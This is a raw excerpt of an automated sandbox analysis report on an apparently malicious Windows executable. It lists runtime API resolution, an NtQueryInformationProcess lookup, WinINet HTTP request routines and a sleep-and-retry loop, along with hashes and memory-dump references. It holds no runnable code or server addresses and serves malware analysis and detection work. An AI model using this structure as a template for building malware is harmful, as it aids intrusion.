                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                            • ExitProcess.KERNEL32 ref: 0040117E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitInfoProcessSystem
                                                            • String ID:
                                                            • API String ID: 752954902-0
                                                            • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                            • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                            • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                            • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6
                                                            Function 00419C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                                            APIs
                                                            • GetProcAddress.KERNEL32(75900000,00842C50), ref: 00419C2D
                                                            • GetProcAddress.KERNEL32(75900000,00842DB0), ref: 00419C45
                                                            • GetProcAddress.KERNEL32(75900000,00874350), ref: 00419C5E
                                                            • GetProcAddress.KERNEL32(75900000,00874248), ref: 00419C76
                                                            • GetProcAddress.KERNEL32(75900000,00874338), ref: 00419C8E
                                                            • GetProcAddress.KERNEL32(75900000,00874368), ref: 00419CA7
                                                            • GetProcAddress.KERNEL32(75900000,00846558), ref: 00419CBF
                                                            • GetProcAddress.KERNEL32(75900000,008743B0), ref: 00419CD7
                                                            • GetProcAddress.KERNEL32(75900000,00878F10), ref: 00419CF0
                                                            • GetProcAddress.KERNEL32(75900000,00878E98), ref: 00419D08
                                                            • GetProcAddress.KERNEL32(75900000,00878EB0), ref: 00419D20
                                                            • GetProcAddress.KERNEL32(75900000,00842C70), ref: 00419D39
                                                            • GetProcAddress.KERNEL32(75900000,00842B10), ref: 00419D51
                                                            • GetProcAddress.KERNEL32(75900000,00842D30), ref: 00419D69
                                                            • GetProcAddress.KERNEL32(75900000,00842CB0), ref: 00419D82
                                                            • GetProcAddress.KERNEL32(75900000,00878CE8), ref: 00419D9A
                                                            • GetProcAddress.KERNEL32(75900000,00878DA8), ref: 00419DB2
                                                            • GetProcAddress.KERNEL32(75900000,00846580), ref: 00419DCB
                                                            • GetProcAddress.KERNEL32(75900000,00842B30), ref: 00419DE3
                                                            • GetProcAddress.KERNEL32(75900000,00878E50), ref: 00419DFB
                                                            • GetProcAddress.KERNEL32(75900000,00878C28), ref: 00419E14
                                                            • GetProcAddress.KERNEL32(75900000,00878E20), ref: 00419E2C
                                                            • GetProcAddress.KERNEL32(75900000,00878C88), ref: 00419E44
                                                            • GetProcAddress.KERNEL32(75900000,00842B50), ref: 00419E5D
                                                            • GetProcAddress.KERNEL32(75900000,00878EF8), ref: 00419E75
                                                            • GetProcAddress.KERNEL32(75900000,00878CD0), ref: 00419E8D
                                                            • GetProcAddress.KERNEL32(75900000,00878DD8), ref: 00419EA6
                                                            • GetProcAddress.KERNEL32(75900000,00878DC0), ref: 00419EBE
                                                            • GetProcAddress.KERNEL32(75900000,00878EC8), ref: 00419ED6
                                                            • GetProcAddress.KERNEL32(75900000,00878E80), ref: 00419EEF
                                                            • GetProcAddress.KERNEL32(75900000,00878E38), ref: 00419F07
                                                            • GetProcAddress.KERNEL32(75900000,00878D60), ref: 00419F1F
                                                            • GetProcAddress.KERNEL32(75900000,00878D48), ref: 00419F38
                                                            • GetProcAddress.KERNEL32(75900000,00845310), ref: 00419F50
                                                            • GetProcAddress.KERNEL32(75900000,00878C58), ref: 00419F68
                                                            • GetProcAddress.KERNEL32(75900000,00878E68), ref: 00419F81
                                                            • GetProcAddress.KERNEL32(75900000,00842B70), ref: 00419F99
                                                            • GetProcAddress.KERNEL32(75900000,00878C40), ref: 00419FB1
                                                            • GetProcAddress.KERNEL32(75900000,00842CD0), ref: 00419FCA
                                                            • GetProcAddress.KERNEL32(75900000,00878D00), ref: 00419FE2
                                                            • GetProcAddress.KERNEL32(75900000,00878D18), ref: 00419FFA
                                                            • GetProcAddress.KERNEL32(75900000,00842D70), ref: 0041A013
                                                            • GetProcAddress.KERNEL32(75900000,00842DD0), ref: 0041A02B
                                                            • LoadLibraryA.KERNEL32(00878EE0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                            • LoadLibraryA.KERNEL32(00878C70,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                            • LoadLibraryA.KERNEL32(00878CA0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                            • LoadLibraryA.KERNEL32(00878CB8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                            • LoadLibraryA.KERNEL32(00878D30,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                            • LoadLibraryA.KERNEL32(00878D78,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                            • LoadLibraryA.KERNEL32(00878D90,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                            • LoadLibraryA.KERNEL32(00878DF0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                            • GetProcAddress.KERNEL32(75FD0000,00842DF0), ref: 0041A0DA
                                                            • GetProcAddress.KERNEL32(75FD0000,00878E08), ref: 0041A0F2
                                                            • GetProcAddress.KERNEL32(75FD0000,008762D0), ref: 0041A10A
                                                            • GetProcAddress.KERNEL32(75FD0000,00878F40), ref: 0041A123
                                                            • GetProcAddress.KERNEL32(75FD0000,008431F0), ref: 0041A13B
                                                            • GetProcAddress.KERNEL32(73530000,00846418), ref: 0041A160
                                                            • GetProcAddress.KERNEL32(73530000,008431B0), ref: 0041A179
                                                            • GetProcAddress.KERNEL32(73530000,00846238), ref: 0041A191
                                                            • GetProcAddress.KERNEL32(73530000,00878F58), ref: 0041A1A9
                                                            • GetProcAddress.KERNEL32(73530000,00878F88), ref: 0041A1C2
                                                            • GetProcAddress.KERNEL32(73530000,00843150), ref: 0041A1DA
                                                            • GetProcAddress.KERNEL32(73530000,00843110), ref: 0041A1F2
                                                            • GetProcAddress.KERNEL32(73530000,00878FB8), ref: 0041A20B
                                                            • GetProcAddress.KERNEL32(763B0000,008430B0), ref: 0041A22C
                                                            • GetProcAddress.KERNEL32(763B0000,008431D0), ref: 0041A244
                                                            • GetProcAddress.KERNEL32(763B0000,00878FE8), ref: 0041A25D
                                                            • GetProcAddress.KERNEL32(763B0000,00878F70), ref: 0041A275
                                                            • GetProcAddress.KERNEL32(763B0000,008430F0), ref: 0041A28D
                                                            • GetProcAddress.KERNEL32(750F0000,00846260), ref: 0041A2B3
                                                            • GetProcAddress.KERNEL32(750F0000,00845EC8), ref: 0041A2CB
                                                            • GetProcAddress.KERNEL32(750F0000,00878F28), ref: 0041A2E3
                                                            • GetProcAddress.KERNEL32(750F0000,008430D0), ref: 0041A2FC
                                                            • GetProcAddress.KERNEL32(750F0000,00843210), ref: 0041A314
                                                            • GetProcAddress.KERNEL32(750F0000,00845EF0), ref: 0041A32C
                                                            • GetProcAddress.KERNEL32(75A50000,00878FA0), ref: 0041A352
                                                            • GetProcAddress.KERNEL32(75A50000,00843130), ref: 0041A36A
                                                            • GetProcAddress.KERNEL32(75A50000,008761B0), ref: 0041A382
                                                            • GetProcAddress.KERNEL32(75A50000,00878FD0), ref: 0041A39B
                                                            • GetProcAddress.KERNEL32(75A50000,008794B0), ref: 0041A3B3
                                                            • GetProcAddress.KERNEL32(75A50000,00843090), ref: 0041A3CB
                                                            • GetProcAddress.KERNEL32(75A50000,00843170), ref: 0041A3E4
                                                            • GetProcAddress.KERNEL32(75A50000,00879498), ref: 0041A3FC
                                                            • GetProcAddress.KERNEL32(75A50000,008794C8), ref: 0041A414
                                                            • GetProcAddress.KERNEL32(75070000,00843190), ref: 0041A436
                                                            • GetProcAddress.KERNEL32(75070000,008794E0), ref: 0041A44E
                                                            • GetProcAddress.KERNEL32(75070000,008795D0), ref: 0041A466
                                                            • GetProcAddress.KERNEL32(75070000,00879450), ref: 0041A47F
                                                            • GetProcAddress.KERNEL32(75070000,008794F8), ref: 0041A497
                                                            • GetProcAddress.KERNEL32(74E50000,00842FD0), ref: 0041A4B8
                                                            • GetProcAddress.KERNEL32(74E50000,00843230), ref: 0041A4D1
                                                            • GetProcAddress.KERNEL32(75320000,00843050), ref: 0041A4F2
                                                            • GetProcAddress.KERNEL32(75320000,008793A8), ref: 0041A50A
                                                            • GetProcAddress.KERNEL32(6F060000,00843250), ref: 0041A530
                                                            • GetProcAddress.KERNEL32(6F060000,00842F50), ref: 0041A548
                                                            • GetProcAddress.KERNEL32(6F060000,00843270), ref: 0041A560
                                                            • GetProcAddress.KERNEL32(6F060000,00879480), ref: 0041A579
                                                            • GetProcAddress.KERNEL32(6F060000,00842ED0), ref: 0041A591
                                                            • GetProcAddress.KERNEL32(6F060000,00842FF0), ref: 0041A5A9
                                                            • GetProcAddress.KERNEL32(6F060000,00842EF0), ref: 0041A5C2
                                                            • GetProcAddress.KERNEL32(6F060000,00842F10), ref: 0041A5DA
                                                            • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
                                                            • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                                                            • GetProcAddress.KERNEL32(74E00000,00879468), ref: 0041A629
                                                            • GetProcAddress.KERNEL32(74E00000,00876310), ref: 0041A641
                                                            • GetProcAddress.KERNEL32(74E00000,00879510), ref: 0041A659
                                                            • GetProcAddress.KERNEL32(74E00000,00879348), ref: 0041A672
                                                            • GetProcAddress.KERNEL32(74DF0000,00843010), ref: 0041A693
                                                            • GetProcAddress.KERNEL32(6C3C0000,00879408), ref: 0041A6B4
                                                            • GetProcAddress.KERNEL32(6C3C0000,00842FB0), ref: 0041A6CD
                                                            • GetProcAddress.KERNEL32(6C3C0000,00879618), ref: 0041A6E5
                                                            • GetProcAddress.KERNEL32(6C3C0000,008795E8), ref: 0041A6FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: HttpQueryInfoA$InternetSetOptionA
                                                            • API String ID: 2238633743-1775429166
                                                            • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                            • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                            • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                            • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52
                                                            Function 00419860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 674 419b46-419b4d 672->674 675 419b16-419b41 GetProcAddress * 2 672->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                                            APIs
                                                            • GetProcAddress.KERNEL32(75900000,00874500), ref: 004198A1
                                                            • GetProcAddress.KERNEL32(75900000,008744E8), ref: 004198BA
                                                            • GetProcAddress.KERNEL32(75900000,00874488), ref: 004198D2
                                                            • GetProcAddress.KERNEL32(75900000,00874530), ref: 004198EA
                                                            • GetProcAddress.KERNEL32(75900000,00874518), ref: 00419903
                                                            • GetProcAddress.KERNEL32(75900000,00874850), ref: 0041991B
                                                            • GetProcAddress.KERNEL32(75900000,00842E90), ref: 00419933
                                                            • GetProcAddress.KERNEL32(75900000,00842CF0), ref: 0041994C
                                                            • GetProcAddress.KERNEL32(75900000,00874548), ref: 00419964
                                                            • GetProcAddress.KERNEL32(75900000,008744A0), ref: 0041997C
                                                            • GetProcAddress.KERNEL32(75900000,008744B8), ref: 00419995
                                                            • GetProcAddress.KERNEL32(75900000,008744D0), ref: 004199AD
                                                            • GetProcAddress.KERNEL32(75900000,00842C30), ref: 004199C5
                                                            • GetProcAddress.KERNEL32(75900000,008741B8), ref: 004199DE
                                                            • GetProcAddress.KERNEL32(75900000,00874200), ref: 004199F6
                                                            • GetProcAddress.KERNEL32(75900000,00842C90), ref: 00419A0E
                                                            • GetProcAddress.KERNEL32(75900000,00874320), ref: 00419A27
                                                            • GetProcAddress.KERNEL32(75900000,00874398), ref: 00419A3F
                                                            • GetProcAddress.KERNEL32(75900000,00842EB0), ref: 00419A57
                                                            • GetProcAddress.KERNEL32(75900000,008741E8), ref: 00419A70
                                                            • GetProcAddress.KERNEL32(75900000,00842E10), ref: 00419A88
                                                            • LoadLibraryA.KERNEL32(00874218,?,00416A00), ref: 00419A9A
                                                            • LoadLibraryA.KERNEL32(00874260,?,00416A00), ref: 00419AAB
                                                            • LoadLibraryA.KERNEL32(00874278,?,00416A00), ref: 00419ABD
                                                            • LoadLibraryA.KERNEL32(00874290,?,00416A00), ref: 00419ACF
                                                            • LoadLibraryA.KERNEL32(008743C8,?,00416A00), ref: 00419AE0
                                                            • GetProcAddress.KERNEL32(75070000,00874380), ref: 00419B02
                                                            • GetProcAddress.KERNEL32(75FD0000,008743F8), ref: 00419B23
                                                            • GetProcAddress.KERNEL32(75FD0000,008742F0), ref: 00419B3B
                                                            • GetProcAddress.KERNEL32(75A50000,00874308), ref: 00419B5D
                                                            • GetProcAddress.KERNEL32(74E50000,00842E50), ref: 00419B7E
                                                            • GetProcAddress.KERNEL32(76E80000,00874860), ref: 00419B9F
                                                            • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                                                            Strings
                                                            • NtQueryInformationProcess, xrefs: 00419BAA
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: NtQueryInformationProcess
                                                            • API String ID: 2238633743-2781105232
                                                            • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                            • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                            • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                            • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12
                                                            Function 00406280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                            • StrCmpCA.SHLWAPI(?,0087AEB0), ref: 00406303
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                            • HttpOpenRequestA.WININET(00000000,GET,?,0087A830,00000000,00000000,00400100,00000000), ref: 00406385
                                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                            • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                            • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                            • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                            • String ID: ERROR$ERROR$GET
                                                            • API String ID: 3074848878-2509457195
                                                            • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                            • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                            • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                            • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56
                                                            Function 004117A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 826 4117a0-4117cd call 41aad0 StrCmpCA 829 4117d7-4117f1 call 41aad0 strtok_s 826->829 830 4117cf-4117d1 ExitProcess 826->830 833 4117f4-4117f8 829->833 834 4119c2-4119cd call 41a800 833->834 835 4117fe-411811 833->835 837 411817-41181a 835->837 838 41199e-4119bd strtok_s 835->838 840 411821-411830 call 41a820 837->840 841 411849-411858 call 41a820 837->841 842 4118ad-4118be StrCmpCA 837->842 843 4118cf-4118e0 StrCmpCA 837->843 844 41198f-411999 call 41a820 837->844 845 4118f1-411902 StrCmpCA 837->845 846 411951-411962 StrCmpCA 837->846 847 411970-411981 StrCmpCA 837->847 848 411913-411924 StrCmpCA 837->848 849 411932-411943 StrCmpCA 837->849 850 411835-411844 call 41a820 837->850 851 41185d-41186e StrCmpCA 837->851 852 41187f-411890 StrCmpCA 837->852 838->833 840->838 841->838 859 4118c0-4118c3 842->859 860 4118ca 842->860 861 4118e2-4118e5 843->861 862 4118ec 843->862 844->838 863 411904-411907 845->863 864 41190e 845->864 869 411964-411967 846->869 870 41196e 846->870 872 411983-411986 847->872 873 41198d 847->873 865 411930 848->865 866 411926-411929 848->866 867 411945-411948 849->867 868 41194f 849->868 850->838 855 411870-411873 851->855 856 41187a 851->856 857 411892-41189c 852->857 858 41189e-4118a1 852->858 855->856 856->838 876 4118a8 857->876 858->876 859->860 860->838 861->862 862->838 863->864 864->838 865->838 866->865 867->868 868->838 869->870 870->838 872->873 873->838 876->838
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcessstrtok_s
                                                            • String ID: block
                                                            • API String ID: 3407564107-2199623458
                                                            • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                            • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                            • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                            • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A
                                                            Function 00415510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 879 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 895 41557c-415583 879->895 896 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 895->896 897 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 895->897 913 4155bb-4155d2 call 41a8a0 call 41a800 896->913 923 415693-4156a9 call 41aad0 StrCmpCA 897->923 926 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 897->926 913->923 929 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 923->929 930 4156af-4156b6 923->930 926->923 1061 415ac3-415ac6 929->1061 931 4157da-41585f call 41aad0 StrCmpCA 930->931 932 4156bc-4156c3 930->932 950 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 931->950 951 415865-41586c 931->951 935 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 932->935 936 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 932->936 935->931 936->931 1039 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 936->1039 950->1061 956 415872-415879 951->956 957 41598f-415a14 call 41aad0 StrCmpCA 951->957 963 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 956->963 964 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 956->964 986 415a16-415a21 Sleep 957->986 987 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 957->987 963->957 1065 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 963->1065 964->957 986->895 987->1061 1039->931 1065->957
                                                            APIs
                                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00876340,?,0042110C,?,00000000), ref: 0041A82B
                                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                              • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                              • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                              • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                              • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                              • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                            • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
